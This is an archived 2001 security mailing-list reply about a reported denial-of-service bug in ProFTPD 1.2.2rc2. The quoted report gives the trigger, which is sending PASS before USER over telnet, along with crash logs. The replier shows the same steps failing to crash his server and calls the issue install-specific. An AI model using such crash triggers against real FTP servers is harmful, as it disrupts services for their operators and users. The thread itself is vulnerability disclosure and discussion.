Vulnerability Development mailing list archives
Re: ProFTPD 1.2.2rc2 DoS
From: Kurth Bemis <kurth () usaexpress net>
Date: Mon, 4 Jun 2001 09:19:31 -0400 (EDT)
Hrm. I run the same version here...look: ------------- kurth@trinity:~$ telnet localhost 21 Trying 127.0.0.1... Connected to trinity. Escape character is '^]'. 220 ProFTPD 1.2.2rc2 Server (XXXXXXXX.XXXXXXXX.XXX ftp server) [trinity] pass 503 Login with USER first. ------------- and in the logs: ------------- Jun 4 09:11:56 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - connected - local : 127.0.0.1:21 Jun 4 09:11:56 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - connected - remote : 127.0.0.1:4055 Jun 4 09:11:56 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - FTP session opened. Jun 4 09:11:59 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - received: PASS (hidden) Jun 4 09:12:04 trinity last message repeated 3 times Jun 4 09:12:07 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - received: USER Jun 4 09:12:07 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - received: USER Jun 4 09:12:09 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - received: PASS (hidden) Jun 4 09:12:09 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - received: PASS (hidden) Jun 4 09:12:10 trinity proftpd[31773]: trinity (trinity[127.0.0.1]) - FTP session closed. ---------------- On debian you need to configure with a special flag to make proftpd use the old md5 auth or something or other. its too early in the morning to really think. :-) If it comes to me later in the day I'll post it if nobody else does. I think that this problem is unique to your install. ~kurth Kurth Bemis Senior Network Admin/Owner: USAExpress.net Owner: Ozone Computer http://kurth.hardcrypto.com PGP Key Avail. --------------------------------------------------------------------- Uh!.....Uh!.....Uh!....."I'm done with this."...Out the window On Sun, 3 Jun 2001, Daniel wrote:
I've discovered that ProFTPD 1.2.2rc2 has a bug - each instance of the daemon can be crashed remotely: This happens when the PASS command is received before the USER command: box:~# telnet 127.0.0.1 21 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. 220 ProFTPD 1.2.2rc2 Server (ProFTPD Default Installation) [box.xxx.com] pass Connection closed by foreign host. box:~# If you run proftpd -d 5, (debug mode, level 5) in the logs you see: box.xxx.com (localhost[127.0.0.1]) - FTP session opened. box.xxx.com (localhost[127.0.0.1]) - received: PASS (hidden) box.xxx.com (localhost[127.0.0.1]) - ProFTPD terminating (signal 11) - Daniel Volozov
Current thread:
- ProFTPD 1.2.2rc2 DoS Daniel (Jun 03)
- Re: ProFTPD 1.2.2rc2 DoS Daniel Roesen (Jun 03)
- Re: ProFTPD 1.2.2rc2 DoS Kurth Bemis (Jun 04)
- Odp: ProFTPD 1.2.2rc2 DoS ma (Jun 04)